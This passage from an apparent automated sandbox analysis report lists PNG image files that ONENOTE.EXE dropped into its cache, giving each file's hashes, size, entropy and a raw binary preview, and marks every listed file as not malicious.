                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11332
                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4181
                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2599
                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1570
                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4490
                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000019.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11449
                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001C.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3679
                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001D.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2232
                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001E.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001F.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13084
                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001G.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001H.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4847
                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001I.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
